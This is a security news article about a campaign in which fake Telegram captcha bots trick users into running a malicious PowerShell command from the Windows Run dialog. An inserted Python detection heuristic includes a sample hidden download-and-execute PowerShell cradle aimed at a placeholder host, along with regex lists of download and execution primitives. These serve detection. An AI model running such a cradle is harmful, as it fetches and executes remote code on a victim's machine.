Criminals Exploit Telegram Captcha to Trick Victims into Installing Malware

Vlad CONSTANTINESCU

January 23, 2025

Threat actors piggyback on Ross Ulbricht’s pardoning to spread malware via rogue Telegram captchas in a new malicious campaign spotted on X.

New malicious campaign targets X and Telegram users

Threat actors have been spotted using a deceitful tactic to trick users into joining rogue Telegram channels and unwittingly infect themselves with malware.

Vx-underground, who spotted the attack, says perpetrators are now spamming Ross Ulbricht’s official X account with messages from accounts either impersonating or claiming to be associated with him.

Ross Ulbricht’s pardoning weaponized

Ross William Ulbricht has recently been in the headlines: the creator of the infamous Silk Road darknet marketplace was pardoned yesterday.

The fake messages attempt to direct visitors to a purported official Ross Ulbricht Telegram channel, where an identity check through a so-called “Safeguard Captcha” bot is imposed.

Deceit through fake Telegram captchas

To proceed with the identity verification, users are asked to open the Windows Run dialog, paste a command, and execute it.

Although the bot’s instructions may appear benign, the pasted text is a PowerShell command that connects to a malicious URL and downloads a malicious PowerShell script.

The script then downloads an additional batch of malicious files that propagate the malware on the host system.
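The infection chain above (a shell launched from the Run dialog that fetches a remote script and executes it) leaves a recognisable process-creation pattern. The following detection heuristic is an added example, not code from the article or from vx-underground; the Sysmon-style events, file paths and hostname are constructed, and "explorer.exe as parent" is used as an approximation of a Run-dialog launch.

```python
import re

# Constructed Sysmon-style process-creation events (not from the article).
# The third mimics the lure: PowerShell started from the Run dialog that
# downloads and executes a remote script. The hostname is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\updater.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://placeholder.invalid/v.ps1')\""},
]

# Network-fetch primitives commonly seen in PowerShell download cradles.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"invoke-restmethod|\birm\b|start-bitstransfer|net\.webclient)",
    re.IGNORECASE)
# Primitives that execute fetched text (or hide it in an encoded command).
EXEC_PRIMITIVES = re.compile(
    r"(invoke-expression|\biex\b|-e(nc|ncodedcommand)?\b)", re.IGNORECASE)
# Interpreters a pasted Run-dialog command typically lands in.
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")


def is_runbox_download_cradle(event):
    """True when a shell whose parent is explorer.exe (what the Run dialog
    spawns; Start-menu launches look the same, so the command-line content
    is the real signal) both fetches from the network and executes it."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    if image not in SHELL_IMAGES or parent != "explorer.exe":
        return False
    cmd = event["CommandLine"]
    return bool(DOWNLOAD_PRIMITIVES.search(cmd) and EXEC_PRIMITIVES.search(cmd))


def flag_events(events):
    """Indices of events matching the Run-dialog download-cradle pattern."""
    return [i for i, e in enumerate(events) if is_runbox_download_cradle(e)]


if __name__ == "__main__":
    print(flag_events(SAMPLE_EVENTS))  # → [2]
```

On a real host the Run dialog also records pasted commands under the RunMRU key in the user's HKCU hive, so a registry-write alert on that key can corroborate a process-creation hit.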

Cobalt Strike potentially used in this campaign

Although the true nature of the downloaded files is unknown, some users speculate they could cloak a Cobalt Strike loader.

Cobalt Strike is a commercial penetration testing tool widely abused by attackers; it gives them remote control of infected devices, which opens the door to further malicious activity such as ransomware deployment and data exfiltration.

Mitigating Telegram scams and other cyber threats

Given that the threat actors phrased the fake verification system carefully to avoid raising suspicion, it is fair to assume the scam could easily go unnoticed.

Vigilance alone might not be enough in such cases. Users should avoid running commands found online in the Windows Run dialog, PowerShell, or CMD, especially when they are uncertain what those commands do on the host machine.

Specialized software like Bitdefender Ultimate Security can boost your defenses by detecting and blocking suspicious activity before it does harm.

It safeguards your devices against viruses, worms, spyware, Trojans, ransomware, rootkits, zero-day exploits, and other intrusions.

Its key features include continuous, comprehensive protection against all known threats, behavioral detection for active apps, network threat prevention, AI-powered scam detection, web attack prevention, and anti-fraud technology to keep you safe.
